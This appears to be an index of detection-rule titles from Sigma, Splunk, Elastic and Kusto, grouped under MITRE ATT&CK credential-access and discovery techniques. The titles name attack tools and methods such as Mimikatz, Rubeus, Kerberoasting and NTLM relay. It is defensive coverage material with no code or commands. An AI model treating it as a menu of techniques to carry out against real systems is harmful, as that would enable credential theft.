- Sigma PFX File Creation test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PowerShell Get-Process LSASS test
- Sigma Private Keys Reconnaissance Via CommandLine Tools test
- Elastic Suspicious CertUtil Commands production
- Splunk Windows Export Certificate production
- Splunk Windows PowerShell Export Certificate production
- Splunk Windows PowerShell Export PfxCertificate production
- Splunk Windows Private Keys Discovery production
Unsecured Credentials: Group Policy Preferences T1552.006 6 rules
- Sigma Findstr GPP Passwords test
- Sigma LSASS Process Reconnaissance Via Findstr.EXE test
- Sigma Permission Misconfiguration Reconnaissance Via Findstr.EXE test
- Sigma Suspicious SYSVOL Domain Group Policy Access test
- Splunk Windows Findstr GPP Discovery production
- Splunk Windows PowerSploit GPP Discovery production
Credentials from Password Stores T1555 44 rules
- Sigma Access To Browser Credential Files By Uncommon Applications - Security test
- Sigma Access to Browser Login Data test
- Sigma Azure Active Directory Connect credentials dump via network share experimental
- Splunk Browser Credential File Accessed - Windows (Windows Event Log)
- Elastic Browser Process Spawned from an Unusual Parent production
- Sigma Credentials (protected by DPAPI) dump via network share experimental
- Sigma DPAPI Backup Keys And Certificate Export Activity IOC test
- Sigma Dump Credentials from Windows Credential Manager With PowerShell test
- Sigma Enumerate Credentials from Windows Credential Manager With PowerShell test
- Sigma HackTool - SecurityXploded Execution stable
- Sigma HackTool - WinPwn Execution test
- Sigma HackTool - WinPwn Execution - ScriptBlock test
- Elastic Multiple Vault Web Credentials Read production
- Splunk Non Chrome Process Accessing Chrome Default Dir production
- Splunk Non Firefox Process Access Firefox Profile Dir production
- Splunk Possible Browser Pass View Parameter production
- Sigma Potential Browser Data Stealing test
- Elastic Potential Credential Access via Trusted Developer Utility production
- Elastic Potential Veeam Credential Access Command production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Kusto PRT Credential Stealing
- Sigma PUA - WebBrowserPassView Execution test
- YARA-L Recon Credential Theft CISA Report
- Sigma Remote Thread Created In KeePass.EXE test
- Elastic Searching for Saved Credentials via VaultCmd production
- Sigma SQLite Chromium Profile Data DB Access test
- Splunk Stored Credentials from Web Browsers - Windows (PowerShell)
- Sigma Suspicious Key Manager Access test
- Sigma Suspicious Serv-U Process Pattern test
- Sigma User application credentials dump via network share (DonPapi, Lazagne) experimental
- Sigma User browser credentials dump via network share (DonPapi, Lazagne) experimental
- Sigma User files dump via network share (DonPapi, Lazagne) experimental
- Sigma Vault credentials manager accessed experimental
- Sigma Vault credentials manager accessed experimental
- Elastic Veeam Backup Library Loaded by Unusual Process production
- Sigma Windows Credential Manager Access via VaultCmd test
- Splunk Windows Credentials Access via VaultCli Module production
- Splunk Windows Credentials from Password Stores Chrome Copied in TEMP Dir production
- Splunk Windows Credentials from Password Stores Creation production
- Splunk Windows Credentials from Password Stores Deletion production
- Splunk Windows Credentials from Password Stores Query production
- Splunk Windows Credentials from Web Browsers Saved in TEMP Folder production
- Splunk Windows Password Managers Discovery production
- Elastic Wireless Credential Dumping using Netsh Command production
Credentials from Password Stores: Credentials from Web Browsers T1555.003 17 rules
- Sigma Access To Browser Credential Files By Uncommon Applications - Security test
- Sigma Access to Browser Login Data test
- Splunk Browser Credential File Accessed - Windows (Windows Event Log)
- Elastic Browser Process Spawned from an Unusual Parent production
- Sigma HackTool - WinPwn Execution test
- Sigma HackTool - WinPwn Execution - ScriptBlock test
- Splunk Non Chrome Process Accessing Chrome Default Dir production
- Splunk Non Firefox Process Access Firefox Profile Dir production
- Splunk Possible Browser Pass View Parameter production
- Sigma Potential Browser Data Stealing test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PUA - WebBrowserPassView Execution test
- Sigma SQLite Chromium Profile Data DB Access test
- Splunk Stored Credentials from Web Browsers - Windows (PowerShell)
- Sigma User browser credentials dump via network share (DonPapi, Lazagne) experimental
- Splunk Windows Credentials from Password Stores Chrome Copied in TEMP Dir production
- Splunk Windows Credentials from Web Browsers Saved in TEMP Folder production
Credentials from Password Stores: Windows Credential Manager T1555.004 9 rules
- Sigma Credentials (protected by DPAPI) dump via network share experimental
- Elastic Multiple Vault Web Credentials Read production
- Elastic Potential Credential Access via Trusted Developer Utility production
- Elastic Searching for Saved Credentials via VaultCmd production
- Sigma Suspicious Key Manager Access test
- Sigma Vault credentials manager accessed experimental
- Sigma Vault credentials manager accessed experimental
- Sigma Windows Credential Manager Access via VaultCmd test
- Splunk Windows Credentials Access via VaultCli Module production
Credentials from Password Stores: Password Managers T1555.005 2 rules
- Sigma Remote Thread Created In KeePass.EXE test
- Splunk Windows Password Managers Discovery production
Modify Authentication Process T1556 14 rules
- Sigma Directory Service Restore Mode(DSRM) Registry Value Tampering test
- Splunk Disabling Windows Local Security Authority Defences via Registry production
- Sigma Dropping Of Password Filter DLL test
- Elastic Network Logon Provider Registry Modification production
- Sigma Possible Shadow Credentials Added test
- Splunk Potential LSA password filter (PowerShell)
- Splunk Potential LSA password filter (Windows Event Log)
- Elastic Potential Shadow Credentials added to AD Object production
- Sigma Potential Suspicious Activity Using SeCEdit test
- Sigma Powershell Install a DLL in System Directory test
- Kusto Rouge RDP: Suspicious File Creation
- Splunk Suspicious Certificate Authentication (Windows Event Log)
- Splunk Suspicious Certificate Modification (Windows Event Log)
- Elastic Untrusted DLL Loaded by Azure AD Connect Authentication Agent production
Modify Authentication Process: Hybrid Identity T1556.007 1 rule
- Elastic Untrusted DLL Loaded by Azure AD Connect Authentication Agent production
Modify Authentication Process: Network Provider DLL T1556.008 1 rule
- Elastic Network Logon Provider Registry Modification production
Adversary-in-the-Middle T1557 37 rules
- Sigma Attempts of Kerberos Coercion Via DNS SPN Spoofing experimental
- Elastic Creation of a DNS-Named Record production
- Elastic Creation or Modification of Root Certificate production
- Sigma Discovery for print spooler bug abuse (NTLM hash retrivial) via named pipe experimental
- Elastic DNS Global Query Block List Modified or Disabled production
- Splunk DNS Kerberos Coercion production
- Sigma Exchange server impersonation via PrivExchange relay attack experimental
- Sigma HackTool - ADCSPwn Execution test
- Sigma HackTool - Impacket Tools Execution test
- Sigma ISATAP Router Address Was Set experimental
- Sigma Local Privilege Escalation Indicator TabTip test
- Sigma Notepad++ Updater DNS Query to Uncommon Domains experimental
- Kusto NTLM Relay Attack
- Elastic Potential ADIDNS Poisoning via Wildcard Record Creation production
- Elastic Potential Computer Account NTLM Relay Activity production
- Sigma Potential Kerberos Coercion by Spoofing SPNs via DNS Manipulation experimental
- Elastic Potential Kerberos Coercion via DNS-Based SPN Spoofing production
- Elastic Potential Kerberos Relay Attack against a Computer Account production
- Elastic Potential Kerberos SPN Spoofing via Suspicious DNS Query production
- Elastic Potential Local NTLM Relay via HTTP production
- Elastic Potential Machine Account Relay Attack via SMB production
- Elastic Potential NTLM Relay Attack against a Computer Account production
- Sigma Potential SMB Relay Attack Tool Execution test
- Sigma Potential Suspicious Activity Using SeCEdit test
- Elastic Potential WPAD Spoofing via DNS Record Creation production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma RottenPotato Like Attack Pattern test
- Elastic Service Creation via Local Kerberos Authentication production
- Sigma Suspicious Child Process of Notepad++ Updater - GUP.Exe experimental
- Sigma Suspicious DNS Query Indicating Kerberos Coercion via DNS Object SPN Spoofing experimental
- Splunk Suspicious Spool Authentication (Windows Event Log)
- Sigma Uncommon File Created by Notepad++ Updater Gup.EXE experimental
- Sigma WinDivert Driver Load test
- Splunk Windows Credential Target Information Structure in Commandline production
- Splunk Windows Kerberos Coercion via DNS production
- Splunk Windows Short Lived DNS Record production
- Splunk Windows Theme File Creation in Unusual Location production
Adversary-in-the-Middle: Name Resolution Poisoning and SMB Relay T1557.001 25 rules
- Sigma Attempts of Kerberos Coercion Via DNS SPN Spoofing experimental
- Elastic Creation of a DNS-Named Record production
- Sigma Discovery for print spooler bug abuse (NTLM hash retrivial) via named pipe experimental
- Splunk DNS Kerberos Coercion production
- Sigma Exchange server impersonation via PrivExchange relay attack experimental
- Sigma HackTool - ADCSPwn Execution test
- Sigma HackTool - Impacket Tools Execution test
- Sigma Local Privilege Escalation Indicator TabTip test
- Kusto NTLM Relay Attack
- Elastic Potential Computer Account NTLM Relay Activity production
- Elastic Potential Kerberos Coercion via DNS-Based SPN Spoofing production
- Elastic Potential Kerberos Relay Attack against a Computer Account production
- Elastic Potential Kerberos SPN Spoofing via Suspicious DNS Query production
- Elastic Potential Machine Account Relay Attack via SMB production
- Elastic Potential NTLM Relay Attack against a Computer Account production
- Sigma Potential SMB Relay Attack Tool Execution test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma RottenPotato Like Attack Pattern test
- Sigma Suspicious DNS Query Indicating Kerberos Coercion via DNS Object SPN Spoofing experimental
- Splunk Suspicious Spool Authentication (Windows Event Log)
- Sigma WinDivert Driver Load test
- Splunk Windows Credential Target Information Structure in Commandline production
- Splunk Windows Kerberos Coercion via DNS production
- Splunk Windows Short Lived DNS Record production
- Splunk Windows Theme File Creation in Unusual Location production
Adversary-in-the-Middle: DHCP Spoofing T1557.003 1 rule
- Sigma Potential Kerberos Coercion by Spoofing SPNs via DNS Manipulation experimental
Steal or Forge Kerberos Tickets T1558 67 rules
- Sigma Administrator login impersonation with forged Golden ticket stable
- Splunk Disabled Kerberos Pre-Authentication Discovery With Get-ADUser production
- Splunk Disabled Kerberos Pre-Authentication Discovery With PowerView production
- Sigma HackTool - KrbRelay Execution test
- Sigma HackTool - KrbRelayUp Execution test
- Sigma HackTool - Mimikatz Kirbi File Creation test
- Sigma HackTool - RemoteKrbRelay Execution test
- Sigma HackTool - Rubeus Execution stable
- Sigma HackTool - Rubeus Execution - ScriptBlock test
- Sigma Kerberoasting Activity - Initial Query test
- Splunk Kerberoasting spn request with RC4 encryption production
- Sigma Kerberos AS-REP Roasting ticket request detected experimental
- Sigma Kerberos key list attack for credential dumping experimental
- Elastic Kerberos Pre-authentication Disabled for User production
- Splunk Kerberos Pre-Authentication Flag Disabled in UserAccountControl production
- Splunk Kerberos Pre-Authentication Flag Disabled with PowerShell production
- Splunk Kerberos Service Ticket Request Using RC4 Encryption production
- Sigma Kerberos TGS ticket request related to a potential Golden ticket experimental
- Sigma Kerberos ticket without a trailing $ (CVE-2021-42278/42287) experimental
- Elastic Kerberos Traffic from Unusual Process production
- Elastic Kirbi File Creation production
- Elastic KRBTGT Delegation Backdoor production
- Splunk Mimikatz (Sysmon)
- Splunk Mimikatz (Windows Event Log)
- Sigma No Suitable Encryption Key Found For Generating Kerberos Ticket test
- Sigma Potential CVE-2021-42278 Exploitation Attempt test
- Sigma Potential CVE-2021-42287 Exploitation Attempt test
- Kusto Potential Kerberoasting
- Sigma Potential SPN Enumeration Via Setspn.EXE test
- Sigma Potential Unconstrained Delegation Discovery Via Get-ADComputer - ScriptBlock experimental
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Register new Logon Process by Rubeus test
- Sigma Replay Attack Detected test
- Splunk Rubeus Command Line Parameters production
- Splunk Rubeus Commands (PowerShell)
- Splunk Rubeus Commands (Sysmon)
- Splunk Rubeus Commands (Windows Event Log)
- Sigma Rubeus Kerberos constrained delegation abuse (S4U2Proxy) experimental
- Sigma Rubeus Kerberos unconstrained delegation abuse experimental
- Splunk Rubeus Password Change (Windows Event Log)
- Elastic Sensitive Privilege SeEnableDelegationPrivilege assigned to a Principal production
- Elastic Service Creation via Local Kerberos Authentication production
- Splunk ServicePrincipalNames Discovery with PowerShell production
- Splunk ServicePrincipalNames Discovery with SetSPN production
- Sigma Shared folder access with forged Golden ticket stable
- Sigma Suspicious Kerberos password account reset to issue potential Golden ticket experimental
- Sigma Suspicious Kerberos proxiable/S4U2self ticket (CVE-2021-42278/42287) experimental
- Sigma Suspicious Kerberos RC4 Ticket Encryption test
- Sigma Suspicious Kerberos Ticket Request via CLI experimental
- Sigma Suspicious Kerberos Ticket Request via PowerShell Script - ScriptBlock test
- Sigma Suspicious SPN enumeration previous to Kerberoasting attack (PowerShell) experimental
- Kusto T1558.003 - Kerberoasting
- Sigma Uncommon Outbound Kerberos Connection test
- Sigma Uncommon Outbound Kerberos Connection - Security test
- Kusto UnPAC the hash
- Splunk Unusual Number of Kerberos Service Tickets Requested production
- Elastic User account exposed to Kerberoasting production
- Sigma User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess' test
- Splunk Windows Computer Account Created by Computer Account production
- Splunk Windows Computer Account Requesting Kerberos Ticket production
- Splunk Windows Computer Account With SPN production
- Splunk Windows Domain Admin Impersonation Indicator production
- Splunk Windows Kerberos Local Successful Logon production
- Splunk Windows PowerView Kerberos Service Ticket Request production
- Splunk Windows PowerView SPN Discovery production
- Splunk Windows Process With NetExec Command Line Parameters production
- Splunk Windows Steal or Forge Kerberos Tickets Klist production
Steal or Forge Kerberos Tickets: Golden Ticket T1558.001 10 rules
- Sigma Administrator login impersonation with forged Golden ticket stable
- Splunk Kerberos Service Ticket Request Using RC4 Encryption production
- Sigma Kerberos TGS ticket request related to a potential Golden ticket experimental
- Splunk Mimikatz (Sysmon)
- Splunk Mimikatz (Windows Event Log)
- Splunk Rubeus Commands (PowerShell)
- Splunk Rubeus Commands (Sysmon)
- Splunk Rubeus Commands (Windows Event Log)
- Sigma Shared folder access with forged Golden ticket stable
- Sigma Suspicious Kerberos password account reset to issue potential Golden ticket experimental
Steal or Forge Kerberos Tickets: Silver Ticket T1558.002 7 rules
- Splunk Mimikatz (Sysmon)
- Splunk Mimikatz (Windows Event Log)
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Rubeus Commands (PowerShell)
- Splunk Rubeus Commands (Sysmon)
- Splunk Rubeus Commands (Windows Event Log)
- Kusto UnPAC the hash
Steal or Forge Kerberos Tickets: Kerberoasting T1558.003 32 rules
- Sigma HackTool - KrbRelay Execution test
- Sigma HackTool - KrbRelayUp Execution test
- Sigma HackTool - RemoteKrbRelay Execution test
- Sigma HackTool - Rubeus Execution stable
- Sigma HackTool - Rubeus Execution - ScriptBlock test
- Sigma Kerberoasting Activity - Initial Query test
- Splunk Kerberoasting spn request with RC4 encryption production
- Elastic Kerberos Traffic from Unusual Process production
- Sigma No Suitable Encryption Key Found For Generating Kerberos Ticket test
- Sigma Potential CVE-2021-42278 Exploitation Attempt test
- Sigma Potential CVE-2021-42287 Exploitation Attempt test
- Sigma Potential SPN Enumeration Via Setspn.EXE test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Register new Logon Process by Rubeus test
- Splunk Rubeus Command Line Parameters production
- Splunk Rubeus Commands (PowerShell)
- Splunk Rubeus Commands (Sysmon)
- Splunk Rubeus Commands (Windows Event Log)
- Splunk ServicePrincipalNames Discovery with PowerShell production
- Splunk ServicePrincipalNames Discovery with SetSPN production
- Sigma Suspicious Kerberos RC4 Ticket Encryption test
- Sigma Suspicious Kerberos Ticket Request via CLI experimental
- Sigma Suspicious Kerberos Ticket Request via PowerShell Script - ScriptBlock test
- Sigma Suspicious SPN enumeration previous to Kerberoasting attack (PowerShell) experimental
- Kusto T1558.003 - Kerberoasting
- Sigma Uncommon Outbound Kerberos Connection - Security test
- Splunk Unusual Number of Kerberos Service Tickets Requested production
- Elastic User account exposed to Kerberoasting production
- Sigma User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess' test
- Splunk Windows PowerView Kerberos Service Ticket Request production
- Splunk Windows PowerView SPN Discovery production
- Splunk Windows Process With NetExec Command Line Parameters production
Steal or Forge Kerberos Tickets: AS-REP Roasting T1558.004 8 rules
- Splunk Disabled Kerberos Pre-Authentication Discovery With Get-ADUser production
- Splunk Disabled Kerberos Pre-Authentication Discovery With PowerView production
- Sigma Kerberos AS-REP Roasting ticket request detected experimental
- Elastic Kerberos Pre-authentication Disabled for User production
- Splunk Kerberos Pre-Authentication Flag Disabled in UserAccountControl production
- Splunk Kerberos Pre-Authentication Flag Disabled with PowerShell production
- Splunk Rubeus Command Line Parameters production
- Splunk Windows Process With NetExec Command Line Parameters production
Steal or Forge Authentication Certificates T1649 25 rules
- Elastic Access to a Sensitive LDAP Attribute production
- Splunk Certificate Abuse - Windows (Sysmon)
- Splunk Certificate Abuse - Windows (Windows Event Log)
- Splunk Certificate Enumeration - Windows (Windows Event Log)
- Sigma Certificate Exported From Local Certificate Store test
- Sigma Certificate Private Key Acquired test
- Splunk Certutil exe certificate extraction production
- Splunk Detect Certify Command Line Arguments production
- Splunk Detect Certify With PowerShell Script Block Logging production
- Splunk Detect Certipy File Modifications production
- Sigma HackTool - Certify Execution test
- Sigma HackTool - Certipy Execution test
- Splunk Windows Export Certificate production
- Splunk Windows Mimikatz Crypto Export File Extensions production
- Splunk Windows PowerShell Export Certificate production
- Splunk Windows PowerShell Export PfxCertificate production
- Splunk Windows Steal Authentication Certificates - ESC1 Abuse production
- Splunk Windows Steal Authentication Certificates - ESC1 Authentication production
- Splunk Windows Steal Authentication Certificates Certificate Issued production
- Splunk Windows Steal Authentication Certificates Certificate Request production
- Splunk Windows Steal Authentication Certificates CertUtil Backup production
- Splunk Windows Steal Authentication Certificates CryptoAPI production
- Splunk Windows Steal Authentication Certificates CS Backup production
- Splunk Windows Steal Authentication Certificates Export Certificate production
- Splunk Windows Steal Authentication Certificates Export PfxCertificate production
Discovery
System Service Discovery T1007 17 rules
- Splunk Common Active Directory Commands (PowerShell)
- Splunk Common Active Directory Commands (Sysmon)
- Splunk Common Active Directory Commands (Windows Event Log)
- Splunk Common Recon Commands in Short Burst (Sysmon)
- Splunk Common Recon Commands in Short Burst (Windows Event Log)
- Splunk Common Reconnaissance Commands (PowerShell)
- Splunk Common Reconnaissance Commands (Sysmon)
- Splunk Common Reconnaissance Commands (Windows Event Log)
- Elastic Enumeration Command Spawned via WMIPrvSE production
- Sigma HackTool - PCHunter Execution test
- Sigma Net.EXE Execution test
- Sigma Potential Configuration And Service Reconnaissance Via Reg.EXE test
- Sigma Potential Registry Reconnaissance Via PowerShell Script test
- Sigma SC.EXE Query Execution test
- Elastic System Service Discovery through built-in Windows Utilities production
- Splunk Windows Net System Service Discovery production
- Splunk Windows WinPEAS PowerShell Script Execution production
Application Window Discovery T1010 2 rules
- Kusto Qakbot Discovery Activies available
- Sigma SCM Database Handle Failure test
Query Registry T1012 31 rules
- Sigma Azure AD Health Monitoring Agent Registry Keys Access test
- Sigma Azure AD Health Service Agents Registry Keys Access test
- Elastic Enumeration Command Spawned via WMIPrvSE production
- Sigma Exports Critical Registry Keys To a File test
- Sigma Exports Registry Key To a File test
- Sigma HackTool - PCHunter Execution test
- Kusto Microsoft Entra ID Local Device Join Information and Transport Key Registry Keys Access available
- Sigma Operation Wocao Activity test
- Sigma Operation Wocao Activity - Security test
- Sigma Potential Baby Shark Malware Activity test
- Sigma Potential Configuration And Service Reconnaissance Via Reg.EXE test
- Sigma Potential Registry Reconnaissance Via PowerShell Script test
- Splunk Query Registry (PowerShell)
- Splunk Query Registry (Windows Event Log)
- Splunk Reg.exe Process Execution (Sysmon)
- Splunk Reg.exe Process Execution (Windows Event Log)
- Sigma Registry Manipulation via WMI Stdregprov experimental
- Sigma SAM Registry Hive Handle Request test
- Sigma SysKey Registry Keys Access test
- Splunk Windows Credential Access From Browser Password Store production
- Splunk Windows Credentials from Password Stores Chrome Extension Access production
- Splunk Windows Credentials from Password Stores Chrome LocalState Access production
- Splunk Windows Credentials from Password Stores Chrome Login Data Access production
- Splunk Windows Hosts File Access production
- Splunk Windows Non Discord App Access Discord LevelDB production
- Splunk Windows Product Key Registry Query production
- Splunk Windows Query Registry Browser List Application production
- Splunk Windows Query Registry UnInstall Program List production
- Splunk Windows Registry Entries Exported Via Reg production
- Splunk Windows Registry Entries Restored Via Reg production
- Splunk Windows Software Discovery Via PowerShell production
System Network Configuration Discovery T1016 43 rules
- Elastic Active Directory Discovery using AdExplorer production
- Elastic AdFind Command Activity production
- Splunk Adfind Commands (PowerShell)
- Splunk Adfind Commands (Sysmon)
- Splunk Adfind Commands (Windows Event Log)
- Splunk Adfind Execution (EDR)
- Splunk Adfind Execution (PowerShell)
- Splunk Adfind Execution (Sysmon)
- Splunk Adfind Execution (Windows Event Log)
- Splunk Domain Controller Enumeration via nltest (PowerShell)
- Splunk Domain Controller Enumeration via nltest (Sysmon)
- Splunk Domain Controller Enumeration via nltest (Windows Event Log)
- Elastic Enumeration Command Spawned via WMIPrvSE production
- Elastic External IP Lookup from Non-Browser Process production
- Sigma Failed DNS server zone transfer for enumeration purposes experimental
- Sigma Firewall Configuration Discovery Via Netsh.EXE test
- Sigma Firewall configuration enumerated (command) experimental
- Sigma Firewall configuration enumerated (PowerShell) experimental
- Sigma Local Firewall Rules Enumeration Via NetFirewallRule Cmdlet test
- Splunk Multiple nslookup commands (Sysmon)
- Splunk Multiple nslookup commands (Windows Event Log)
- Splunk Network Discovery Using Route Windows App production
- Sigma Nltest.EXE Execution test
- Splunk Nslookup Execution (Windows Event Log)
- Sigma Potential Pikabot Discovery Activity test
- Sigma Potential Recon Activity Via Nltest.EXE test
- Splunk Potential System Network Configuration Discovery Activity production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Kusto Probable AdFind Recon Tool Usage available
- YARA-L Recon Environment Enumeration Network CISA Report
- Elastic Remote System Discovery Commands production
- Sigma Scheduled task enumerated experimental
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious MS Office Child Process production
- Sigma Suspicious Network Command test
- Sigma Suspicious Network Connection to IP Lookup Service APIs test
- Elastic Suspicious PDF Reader Child Process production
- Elastic System Public IP Discovery via DNS Query production
- Splunk Windows PowerShell Invoke-RestMethod IP Information Collection production
- Splunk Windows System Network Config Discovery Display DNS production
- Splunk Windows WinPEAS PowerShell Script Execution production
- Sigma Winlogon process contact to C2 - Blacklotus (Sysmon) experimental
- Elastic Wireless Credential Dumping using Netsh Command production
System Network Configuration Discovery: Internet Connection Discovery T1016.001 5 rules
- Elastic Enumeration Command Spawned via WMIPrvSE production
- Elastic External IP Lookup from Non-Browser Process production
- Splunk Network Discovery Using Route Windows App production
- Elastic Suspicious PDF Reader Child Process production
- Elastic System Public IP Discovery via DNS Query production
Remote System Discovery T1018 66 rules
- Sigma Active Directory Computers Enumeration With Get-AdComputer test
- Elastic Active Directory Discovery using AdExplorer production
- Elastic AdFind Command Activity production
- Splunk Adfind Commands (PowerShell)
- Splunk Adfind Commands (Sysmon)
- Splunk Adfind Commands (Windows Event Log)
- Splunk Adfind Execution (EDR)
- Splunk Adfind Execution (PowerShell)
- Splunk Adfind Execution (Sysmon)
- Splunk Adfind Execution (Windows Event Log)
- Sigma Chopper Webshell Process Pattern test
- Sigma DirectorySearcher Powershell Exploitation test
- Sigma DNS hosts file accessed via network share experimental
- Splunk Domain Controller Discovery with Nltest production
- Splunk Domain Controller Discovery with Wmic production
- Splunk Domain Controller Enumeration via nltest (PowerShell)
- Splunk Domain Controller Enumeration via nltest (Sysmon)
- Splunk Domain Controller Enumeration via nltest (Windows Event Log)
- Elastic Enumerating Domain Trusts via DSQUERY.EXE production
- Elastic Enumerating Domain Trusts via NLTEST.EXE production
- Elastic Enumeration Command Spawned via WMIPrvSE production
- Splunk FScan.exe Network Scan (Sysmon)
- Splunk FScan.exe Network Scan (Windows Event Log)
- Splunk GetAdComputer with PowerShell production
- Splunk GetAdComputer with PowerShell Script Block production
- Splunk GetDomainComputer with PowerShell production
- Splunk GetDomainComputer with PowerShell Script Block production
- Splunk GetDomainController with PowerShell production
- Splunk GetDomainController with PowerShell Script Block production
- Splunk GetWmiObject Ds Computer with PowerShell production
- Splunk GetWmiObject Ds Computer with PowerShell Script Block production
- Sigma HackTool - NetExec Execution experimental
- Kusto LDAP reconnaissance via search filters
- Splunk Multiple nslookup commands (Sysmon)
- Splunk Multiple nslookup commands (Windows Event Log)
- Sigma Net.EXE Execution test
- Sigma Nltest.EXE Execution test
- Splunk NMAP Execution (EDR)
- Splunk NMAP Execution (PowerShell)
- Splunk NMAP Execution (Windows Event Log)
- Elastic Potential Enumeration via Active Directory Web Service production
- Splunk Potential Ping Sweep (Windows Event Log)
- Sigma Potential Unconstrained Delegation Discovery Via Get-ADComputer - ScriptBlock experimental
- Splunk PowerHuntShares Commands (PowerShell)
- Splunk PowerHuntShares Commands (Sysmon)
- Splunk PowerHuntShares Commands (Windows Event Log)
- Kusto Probable AdFind Recon Tool Usage available
- Kusto Probable AdFind Recon Tool Usage (Normalized Process Events)
- Sigma PUA - AdFind Suspicious Execution test
- Sigma PUA - Adidnsdump Execution test
- Elastic Remote System Discovery Commands production
- Splunk Remote System Discovery with Adsisearcher production
- Splunk Remote System Discovery with Dsquery production
- Splunk Remote System Discovery with Wmic production
- Sigma Renamed AdFind Execution test
- Sigma Share And Session Enumeration Using Net.EXE stable
- Sigma Suspicious Scan Loop Network test
- Sigma Webshell Detection With Command Line Keywords test
- Sigma Webshell Hacking Activity Patterns test
- Splunk Windows AdFind Exe production
- Splunk Windows Get-AdComputer Unconstrained Delegation Discovery production
- Splunk Windows Netspy Network Scanner Execution production
- Elastic Windows Network Enumeration production
- Splunk Windows PowerView Constrained Delegation Discovery production
- Splunk Windows PowerView Unconstrained Delegation Discovery production
- Splunk Windows PsTools Recon Usage production
System Owner/User Discovery T1033 55 rules
- Elastic Account Discovery Command via SYSTEM Account production
- Splunk Check Elevated CMD using whoami production
- Sigma Chopper Webshell Process Pattern test
- Splunk Common Recon Commands in Short Burst (Sysmon)
- Splunk Common Recon Commands in Short Burst (Windows Event Log)
- Splunk Common Reconnaissance Commands (PowerShell)
- Splunk Common Reconnaissance Commands (Sysmon)
- Splunk Common Reconnaissance Commands (Windows Event Log)
- Sigma Computer Discovery And Export Via Get-ADComputer Cmdlet test
- Sigma Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell test
- Sigma Enumerate All Information With Whoami.EXE test
- Elastic Enumeration Command Spawned via WMIPrvSE production
- Sigma Get-ADUser Enumeration Using UserAccountControl Flags test
- Splunk GetCurrent User with PowerShell production
- Splunk GetCurrent User with PowerShell Script Block production
- Sigma Group Membership Reconnaissance Via Whoami.EXE test
- Sigma HackTool - SharpLdapWhoami Execution test
- Sigma HackTool - SharpView Execution test
- Kusto LDAP reconnaissance via search filters
- Sigma Local Accounts Discovery test
- YARA-L Local Accounts Discovery
- YARA-L MITRE ATT&CK T1033 Recon Successful Logon Enumeration Powershell CISA Report
- Sigma Potential Dridex Activity stable
- Splunk PowerView_SharpView Commands (PowerShell)
- Sigma Renamed Whoami Execution test
- Sigma Security Privileges Enumeration Via Whoami.EXE test
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious PDF Reader Child Process production
- Sigma Suspicious PowerShell Get Current User test
- Splunk System Owner_User Discovery - Windows (PowerShell)
- Splunk System Owner_User Discovery - Windows (Sysmon)
- Splunk System Owner_User Discovery - Windows (Windows Event Log)
- Splunk System User Discovery With Query production
- Splunk System User Discovery With Whoami production
- Sigma User Discovery And Export Via Get-ADUser Cmdlet test
- Sigma User Discovery And Export Via Get-ADUser Cmdlet - PowerShell test
- Splunk User Discovery via Environment Variables - PowerShell (PowerShell)
- Splunk User Discovery With Env Vars PowerShell production
- Splunk User Discovery With Env Vars PowerShell Script Block production
- Sigma Webshell Detection With Command Line Keywords test
- Sigma Webshell Hacking Activity Patterns test
- Sigma WhoAmI as Parameter test
- YARA-L Whoami Execution
- Elastic Whoami Process Activity production
- Sigma Whoami.EXE Execution Anomaly test
- Sigma Whoami.EXE Execution From Privileged Process test
- Sigma Whoami.EXE Execution With Output Option test
- Elastic Windows Account or Group Discovery production
- Splunk Windows System Discovery Using ldap Nslookup production
- Splunk Windows System Discovery Using Qwinsta production
- Splunk Windows System Remote Discovery With Query production
- Splunk Windows System User Discovery Via Quser production
- Splunk Windows System User Privilege Discovery production
- Splunk Windows WinPEAS PowerShell Script Execution production
Network Sniffing T1040 9 rules
- Sigma Harvesting Of Wifi Credentials Via Netsh.EXE test
- Sigma New Network Trace Capture Started Via Netsh.EXE test
- Sigma PktMon.EXE Execution test
- Sigma Potential Network Sniffing Activity Using Network Tools test
- Sigma Potential Packet Capture Activity Via Start-NetEventSession - ScriptBlock test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Windows native Pktmon sniffer abuse experimental
- Sigma Windows Pcap Drivers test
- Sigma Windows traffic capture abuse experimental
Network Service Discovery T1046 31 rules
- Splunk Advanced IP or Port Scanner Execution production
- Sigma Advanced IP Scanner - File Event test
- Splunk Advanced IP Scanner Execution (Sysmon)
- Splunk Advanced IP Scanner Execution (Windows Event Log)
- Splunk Advanced Port Scanner Execution (Sysmon)
- Splunk Advanced Port Scanner Execution (Windows Event Log)
- Sigma Anonymous access performed to multiple targets experimental
- Splunk FScan.exe Network Scan (Sysmon)
- Splunk FScan.exe Network Scan (Windows Event Log)
- Sigma Grixba Malware Reconnaissance Activity experimental
- Sigma HackTool - winPEAS Execution test
- Sigma HackTool - WinPwn Execution test
- Sigma HackTool - WinPwn Execution - ScriptBlock test
- Splunk Internal Port Scan - Critical Ports (Windows Event Log)
- Splunk masscan Execution - Windows (PowerShell)
- Splunk masscan Execution - Windows (Sysmon)
- Splunk masscan Execution - Windows (Windows Event Log)
- Sigma Network login performed to multiple targets experimental
- Kusto Network Port Sweep from External Network (ASIM Network Session schema) available
- Kusto Port scan detected (ASIM Network Session schema) available
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PUA - Advanced IP Scanner Execution test
- Sigma PUA - Advanced Port Scanner Execution test
- Sigma PUA - NimScan Execution test
- Sigma PUA - Nmap/Zenmap Execution test
- Sigma PUA - SoftPerfect Netscan Execution test
- Sigma Python Initiated Connection test
- Splunk SoftPerfect Network Scanner Execution (Sysmon)
- Splunk SoftPerfect Network Scanner Execution (Windows Event Log)
